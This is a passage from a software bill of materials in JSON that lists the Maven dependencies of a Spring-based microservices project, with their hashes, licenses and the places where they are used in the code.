"311c3115f9f6651d1711c52d1739e25a70f25456cacb9a2cdde7627498c30b13d721133cc75b39462ad18812a82472ef1b3b9d64fab5abb0377c12bf82043a74"}, {"alg": "SHA3-512", "content": "3a8ce565280a157dd6e08fb68c317a4c28616099c56bc4992c38cf74a10a54a89e18e7c45190ce8511360798a87adc92f432382f9d9bdde0d56664b50044b517"}, {"alg": "SHA-1", "content": "83cd2cd674a217ade95a4bb83a8a14f351f48bd0"}, {"alg": "SHA-256", "content": "88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c"}, {"alg": "SHA3-256", "content": "babce5c8beb1d5907a7ed6354589e991da7d8d5cbd86c479abfa1e1dfc4d2eb8"}, {"alg": 
"SHA3-384", "content": "bdf019332ae8714ef6a3904bb42bb08c1fe4feacf5e6137274884b0377d4e5b5f7aa9fe8e1ef5ca9b3e15f12320fdb67"}, {"alg": "MD5", "content": "f8f1352c52a4c6a500b597596501fc64"}], "licenses": [{"license": {"id": "BSD-3-Clause"}}], "name": "antlr", "purl": "pkg:maven/antlr/antlr@2.7.7?type=jar", "scope": "required", "version": "2.7.7"}, {"bom-ref": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\antlr-runtime\\3.4\\antlr-runtime-3.4.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "MD5", "content": "0e0318be407e51fdf7ba6777eabfdf73"}, {"alg": "SHA3-512", "content": "13d1f73c44e807b36946c21cfd506e91e8cbdf685b770cbc0dcb4e55ec28b5bc91bd90eb7f24ebfd13386a47eccf552dd2a1ab277fccabafdb7a9b40aa9d4fc5"}, {"alg": "SHA-512", "content": "1786aff2df4664483adcb319e64be7b69b643ac9508c3f11796b5aa45b9072b46f53f0a21b2ff7291162afe81506de16161746273e4532ebad75adbd81203f0d"}, {"alg": "SHA3-256", "content": "3f6cf631e9f792a41128400f8690266d915c0588ef85073a6cae73624a155b10"}, {"alg": "SHA-256", "content": "5b7cf53b7b30b034023f58030c8147c433f2bee0fe7dec8fae6bebf3708c5a63"}, {"alg": "SHA-384", "content": "6ee2dcd3cf8366fe6ee18fb87aebe2d162b232c89e0aab417f97fed368cdf652d27db518dc5e71aa2a4aadda2e7f4c7a"}, {"alg": "SHA-1", "content": "8f011408269a8e42b8548687e137d8eeb56df4b4"}, {"alg": "SHA3-384", "content": "db284c93203cbbec1b22b482a45c70c68e858a90e73b23fae66c1bc53231b0f61c5576fcf51ea0d3a30070428d7dd865"}], "name": "antlr-runtime", "purl": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "scope": "required", "version": "3.4"}, {"bom-ref": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", 
"type": "framework", "description": "The Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\apache\\commons\\commons-math\\2.2\\commons-math-2.2.jar"}]}}, "group": "org.apache.commons", "hashes": [{"alg": "SHA-256", "content": "15993bb2a3cf50f3291b40fc980a3166a0984e7b5f1abbe5232151fd94954584"}, {"alg": "SHA-1", "content": "4877b85d388275f994a5cfc7eceb73a8045d3006"}, {"alg": "MD5", "content": "4b65633769a2d3c532c86188648bb380"}, {"alg": "SHA-384", "content": "56dde9ba9689a3efae9165010b08469108f4971542809b52facc348a841dbed76d83b5fe218ca24db6d8276f45e39458"}, {"alg": "SHA3-512", "content": "67bcc94b3d2ebf1e8d9862ad5c57609e6315e53fb27f9db16be4e1384a6619aee9e7f2d2ef530380e107d9c337cbcd4bb3a21ff4293931cb9bb488f598c63b5c"}, {"alg": "SHA3-384", "content": "7d71fdb235d8d8c4019164315b6241e893215ee3ed4934a15ccc71bae9154726e8e9ec1ab76daf0e8dec62d0069e806d"}, {"alg": "SHA3-256", "content": "d00d7bef766c466c34e0f624a1ba6ea6a2c1a0a46de81f85e331548d13b5cef0"}, {"alg": "SHA-512", "content": "f444ead8d025d92ebacc05a366cdfd6f3c9b9788f36961cc66a4c71846b9e953a586268c23268a7a8b9561159fc38f7478daea8142b3b55fb3a8dea756720ab6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-math", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "scope": "required", "version": "2.2"}, {"bom-ref": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. 
This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcprov-jdk15on\\1.56\\bcprov-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "SHA3-512", "content": "24ea4d76cc78baecafd8baeae0e201201463d920c102fe20f8dd29ff307785194dc27323215dd24680b77bbb1e65841f8150f047a3b8f007c9b04f4860b4a181"}, {"alg": "MD5", "content": "3c1bc7aaf3449308e34296546078d9f7"}, {"alg": "SHA-512", "content": "47e5f73d2b66891cf21412b807481fff4b1a844ff247ba170e7bab25a7f6303cbd5ada22e7382ba20ee344d8cc3a1909a3d255f4b24defe9357523b4a122db68"}, {"alg": "SHA-256", "content": "963e1ee14f808ffb99897d848ddcdb28fa91ddda867eb18d303e82728f878349"}, {"alg": "SHA-1", "content": "a153c6f9744a3e9dd6feab5e210e1c9861362ec7"}, {"alg": "SHA3-256", "content": "ab4e77030ace3c79f45602cf94baf81ae18305ae83037c5a37077a752cb5bfab"}, {"alg": "SHA-384", "content": "c9de4efe55d8737d5c84e7253cabe2de7b7d72180ef4c0a645ede19f627d3ebce7c0c4f19e51412b7e0a16d6c6255d32"}, {"alg": "SHA3-384", "content": "ef69f74fbf1f5416c90038f07aad6aa83e60932cf8a31400554e0380c134921ed8638528b4339edd5e8b7d1df4f62a3f"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcprov-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Spring Boot AutoConfigure", "evidence": {"callstack": {"frames": [{"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 21, "module": 
"com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 48, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 65, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 46, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 19, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 3, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"fullFilename": 
"statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 46}, {"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 9, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-autoconfigure\\2.0.3.RELEASE\\spring-boot-autoconfigure-2.0.3.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\AccountApplication.java#11"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\AuthApplication.java#9"}, {"location": "config\\src\\main\\java\\com\\piggymetrics\\config\\ConfigApplication.java#7"}, {"location": "gateway\\src\\main\\java\\com\\piggymetrics\\gateway\\GatewayApplication.java#8"}, {"location": "monitoring\\src\\main\\java\\com\\piggymetrics\\monitoring\\MonitoringApplication.java#7"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\NotificationServiceApplication.java#18"}, {"location": "registry\\src\\main\\java\\com\\piggymetrics\\registry\\RegistryApplication.java#7"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\StatisticsApplication.java#21"}, {"location": 
"turbine-stream-service\\src\\main\\java\\com\\piggymetrics\\turbine\\TurbineStreamServiceApplication.java#8"}]}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA-1", "content": "011bc4cc96b08fabad2b3186755818fa0b32d83f"}, {"alg": "MD5", "content": "0a52980d8c71d372ee9c6b100da7f49b"}, {"alg": "SHA3-384", "content": "5bfb3d163cfaaa467d760860d0c0e3825c1bccf2b62626822eb0eaa272bec13798b09b4137b109c58836c3d7566af73d"}, {"alg": "SHA-256", "content": "742df8010f51ac98a14ff19fbd6df1ef0aca7656ad475295fa90444389d2d9d4"}, {"alg": "SHA3-256", "content": "7d51c2f934ca270814c03cb35422d183a5fd16cce3b7a707047f7e1ae610b099"}, {"alg": "SHA-512", "content": "c2918394ff63ad616f64fd2900cc1c688f8772cf05a3f206d2521e2ab525bda29f6e87b18ca7ae4c4c6cd4a248032d51cc0a0d4806370166efbabc77173caac2"}, {"alg": "SHA-384", "content": "cad79a4a727581de121cc68864c456863f396e85adc7b1514bae5f874b5a50ce134ce7723c1697e297d4c61b29dcbd5c"}, {"alg": "SHA3-512", "content": "e057673f1fe4b86b0b3bd60d2feeef09549bd373cfd56e8d8a88b13272f8824b87bc8cfd02fb9739b1456ffa82567e1e99ca3cf6d5c1b7954cd0a0aa8f4d4299"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-autoconfigure", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Starter for aspect-oriented programming with Spring AOP and AspectJ", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-starter-aop\\2.0.3.RELEASE\\spring-boot-starter-aop-2.0.3.RELEASE.jar"}]}}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA3-384", "content": 
"040f344c92763062c6fa2a6de1de4b07d4156db2e6a1b10189af28887a5dcd70a6b8eb505f953910310baaf42c9a06c1"}, {"alg": "SHA3-256", "content": "0b2ef68be5c3f07c5a385ca24cbf50cacffe25f38eb440df5bb2ea9e79d10ff3"}, {"alg": "MD5", "content": "0c857777c2044cd2ececee6b70c1cef5"}, {"alg": "SHA-512", "content": "329768326aa539dbdfda2d7eb79798deccc00948c05a6029159e25058832374789465df103da18fc88a949a08d0c439dde93b7383237106b7b92aac742f2a674"}, {"alg": "SHA-1", "content": "a78c7bc25fd51b217f078421dc40d13ddc3b9f8f"}, {"alg": "SHA-384", "content": "c6cd2c55f39efda38caf74099d2340b02d853c47cf688d66ca8fbcdbd674b1a9725d5553899f2c0ab5c65f5f11c41f10"}, {"alg": "SHA-256", "content": "ddfc437ff26e206e74d8d2b949a978dc39a5bfdade596ab280a9d56efff2d5b1"}, {"alg": "SHA3-512", "content": "ef3aecc2f2545c8224dff5e7dec998b3a2d94c6bb6296b08cf732f8488336431cd152cc15007ddb062cff00e465d9b288205dcbace1bab3859f069748d597674"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-starter-aop", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "This project is a Spring configuration client.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-config-client\\2.0.0.RELEASE\\spring-cloud-config-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-384", "content": "15b9e5813ca5260a888248932b83b3e63cd27bf46ac5db0091718c7c6e91e5d78d7889da0b1fdbaaa12de74e0fdedc49"}, {"alg": "SHA3-256", "content": "263ebd750a961f58776b4cf085feb28381530eace5b8c75d9011eeb19a2bb98d"}, {"alg": "SHA3-512", "content": 
"3d3fd94e8f281be0c4d8059dfd199ac117afba71bbd777c412f7ec7c2937a2e0caa9f01197948f9df1ebb854e0082c7dc3881bf0b7f599607444c3d4bd3016dd"}, {"alg": "SHA3-384", "content": "48ae1e40ca060c109ce89ae48eba68bb348f05aaab6f074aec8c969b66e7b3a811e8bc6e8901c183c14085612bb01dfa"}, {"alg": "MD5", "content": "5f479b27ddaa0d47f0cc6e150ac05c33"}, {"alg": "SHA-1", "content": "7a3f4447664c61ff674c29a9b2ff0dc988dee316"}, {"alg": "SHA-256", "content": "a4c26aaa864418c008b3fb067ad3b54da9a968921db4bab47366b97bd8f8ca30"}, {"alg": "SHA-512", "content": "b545b2744f31d5cc8fd7cf89e42bf7dc1a4464d1761d28f48f7446906c6bd43ec2a696eac0ba2708723ebee36b1f6316f37972e24b76eb1a621f0f153779d4ea"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-config-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Core", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-core\\2.0.0.RELEASE\\spring-cloud-netflix-core-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "MD5", "content": "2070a3bc6e5b770d52cdd65858ddda07"}, {"alg": "SHA3-384", "content": "77e17180e15dca51e4f3d69ff91cc90467f772d014c7a826595b5e1892a0f57bc4b4e037a59495558fefa71764fd5993"}, {"alg": "SHA-512", "content": "7814ad392c384ba4186f164e8b663e600a90c577de54ac89b967126cfe462ce08a2f295f7e54f94db3902f49de8838c70faec413d78a2d23a339a609cadcd41c"}, {"alg": "SHA-1", "content": "796bf4e966fac782c2118396d5504e01d5bd3115"}, {"alg": "SHA-256", "content": "8651ad06e6c91fadd5bf77fba528b9a23a66fb3b57b495ea8da20def6f3b5f6e"}, 
{"alg": "SHA-384", "content": "accd2bb47510f90c7df339cca211b5bf66321df9fdd5a157ed23adc012cd1f914cd94c4174cacb3e641b748ea4275e25"}, {"alg": "SHA3-256", "content": "cb9798a3a5fdf0b1c3233f60f16e9f9ee74e4d451318fb905221ee652828dfff"}, {"alg": "SHA3-512", "content": "e3f2ef307447c7e5cb994da1ca5c3ca390971a7d6062dbdf11f53cf28fe65eb5e1df31ec38474ab4e0feb2dddbc4b519a4984e5509212b5d79906eaaebed3f78"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-core", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-384", "content": "237201a38459c81ecedba61d4d59a522cbea01b65297c1f068e11294dbc9da626035815b1846f08c1737058e33f021e9"}, {"alg": "SHA-256", "content": "7ff7145adc938be815a8055af0cdea0f720c6b356b57ac2136e53bcd5d25e97f"}, {"alg": "SHA-512", "content": "8a3f0018f3bdc5bb1ad4e246526cbdb422202d2b699c3a0cac0a765dd1d865f87b778a702f96ff2ad7b8ac6197afa46b6a6555c694ad57e0d3ce8608d071da73"}, {"alg": "MD5", "content": "8b93d4d30de32748b186aeacfa618f67"}, {"alg": "SHA3-256", "content": "cad94fdc93582973a4376fd3c4ee59ee34855af8f125db916de6e9b1a4b47793"}, {"alg": "SHA-384", "content": "dd690fb96277a00f46f6f81f53204d831853065abfc1bd57e61872b2c4c6858d26cd4be36d88cda8bd05e6e162c14299"}, {"alg": "SHA-1", "content": "e00b09813d5d3714dbbc150b91553267124e2250"}, {"alg": 
"SHA3-512", "content": "fcca16621c429111e17349f412e5f630df3aaed591e8c67457902512f293dbd890c40bd481660e1f95ab4ee3674450e37bf1291afad0e7d8f540c61c267217b4"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-starter-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2d792b6b575950436fe620ac173535a7fa0b7deccf290cbeb37ae7a21b6f6416"}, {"alg": "SHA-512", "content": "2e512df35dff02c0814d1a59a7ba7dbf8a4280c1658565c115f5a599f80401df9d5da043b3c0868230b79ba7c04ec53138f98aeede29fd703ae2ea25d7f357b4"}, {"alg": "SHA3-384", "content": "3a5cd5b3839f0fc79088457664f01597a6f948aa76efda13886f9144fa826b801ecf9b4d2b8135dd2d7d139fb985cacc"}, {"alg": "SHA3-512", "content": "3aa2f65011ba5f3923f0925d1b85180528ab5c57293353b3022ed8e3f90798a77cf13eae4beaea7d54eb60049a4776f5d9c994d56727c8bd7f8e4b9b39aa9d98"}, {"alg": "SHA-256", "content": "4686ea441f3b924e7f1631d49a6fb89a771a778fc7fd32612163d3c60ec21d14"}, {"alg": "MD5", "content": "46d482bf052f34fc1fde298864af2215"}, {"alg": "SHA-1", "content": "4e241e6685a4dfc45987945df6c2477503ae20d7"}, {"alg": "SHA-384", "content": "fe253756cdd8724e26477c505988966012a1e103b07e2f404967ed6760f0cb934d288c5aef8883f462e19a2fe9ea9841"}], "licenses": [{"license": {"id": 
"Apache-2.0"}}], "name": "spring-cloud-starter-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring AOP", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-aop\\5.0.7.RELEASE\\spring-aop-5.0.7.RELEASE.jar"}]}}, "group": "org.springframework", "hashes": [{"alg": "SHA-512", "content": "24ba927d8ea0ca58a8a6722fe99ed165b7174926a3f2ac731eaa8383e7f6b9f74caf7ae39562ef9ee324914ccf8ad5b6b7270bfc688a461c6feed089e778dffb"}, {"alg": "SHA-256", "content": "2de906598bfb44d3e6833c36e1ad9c565275af16da25e13e6f676126f613908c"}, {"alg": "SHA3-256", "content": "3f0c5849b9b772b3544611b78300843d6751fac5bf80dbec44a07d0fb95bb75c"}, {"alg": "SHA-384", "content": "67209dd624bfaa95f376772e89f0e574b971d9224a2c5ca91645a9a00b3e25ab8c4594e96ac7de09c2ac111767ec39ad"}, {"alg": "MD5", "content": "cd592093caba2866661a095786f1ed11"}, {"alg": "SHA3-512", "content": "e3871a6dea5b1a64cc8fba9b05a48a83b3924190f9eab5d576583ec9060cbf1982133f845360f0aa2f05cd9dab6b00a6e5f5dff5d8a33914848fff9bfe0f63d4"}, {"alg": "SHA3-384", "content": "e5a7367855624bc08bbf442cece3b894a285068b7a328e3451818fda2d9a148678c736a18d98eef1a6490587329015f2"}, {"alg": "SHA-1", "content": "fdd0b6aa3c9c7a188c3bfbf6dfd8d40e843be9ef"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-aop", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring 
Beans", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-beans\\5.0.7.RELEASE\\spring-beans-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\config\\ResourceServerConfig.java#28"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-256", "content": "0d0adc1832406304985a72d2c79c6d0af481f34ae2a9c4a3835c9b0968da25e3"}, {"alg": "SHA-512", "content": "58b8e141981594d43cc52fd179f512a1919eaa4ddd323127302fd753b5befb1b5ee8fc3b70adf4963bdaa181ac3ff67ed643bdacdde2881c26f12f55d3c34190"}, {"alg": "SHA3-256", "content": "72ae91c81771a542fb4ce30b45608b43dcfe03d9e18070763e7421fa0389d52c"}, {"alg": "SHA-1", "content": "c1196cb3e56da83e3c3a02ef323699f4b05feedc"}, {"alg": "MD5", "content": "c850badbb984cda6983da22c8672a59f"}, {"alg": "SHA-384", "content": "d2aaea6cd85065710cdc27d25dfd7bdfdea57f0f796214767e83f09b967c6cb2c954369a40e2e6f55f4106b43d099558"}, {"alg": "SHA3-512", "content": "ecb8c1471d73b885db4b4796a95a1af1e229f33724f2d3cbdf8df947f84fd1dcc6064a8ef2552189304df475283c9c899d4bcb3bdf3a0f97390aed50d0f8815b"}, {"alg": "SHA3-384", "content": "f35b746798ceaad156b257f6c208cc3e9783244d68501187af355a98613c048b62cee350b728c67fc067ddca41fabbe1"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-beans", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring Web", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-web\\5.0.7.RELEASE\\spring-web-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\AuthServiceClient.java#12"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\StatisticsServiceClient.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#20"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#25"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#30"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#35"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#10"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#17"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#18"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\service\\security\\CustomUserInfoTokenServices.java#129"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#15"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#16"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#22"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#28"}, {"location": 
"notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\client\\AccountServiceClient.java#12"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#14"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#15"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#21"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\client\\ExchangeRatesClient.java#13"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#14"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#20"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#32"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-1", "content": "2e04c6c2922fbfa06b5948be14a5782db168b6ec"}, {"alg": "SHA3-384", "content": "797a7bd86ef730de5377d6fc66c1b7d03188260b62fbb72a58fbc025926877bbc94b5a7c7a03e4f4e1c0b12fe9a3df13"}, {"alg": "SHA-384", "content": "8af38fbf471db8437161cca583b115bad2084544661de14b98f023013eac4a735e7f820bdaf72118e55b5cbaf78cf1da"}, {"alg": "MD5", "content": "cdb97ca6e419ea429244db6b01ea9d09"}, {"alg": "SHA-256", "content": "d100479905e911a3201de66566f59bd5e2d4137f9d95b6d314acbb80ae985d22"}, {"alg": "SHA-512", "content": 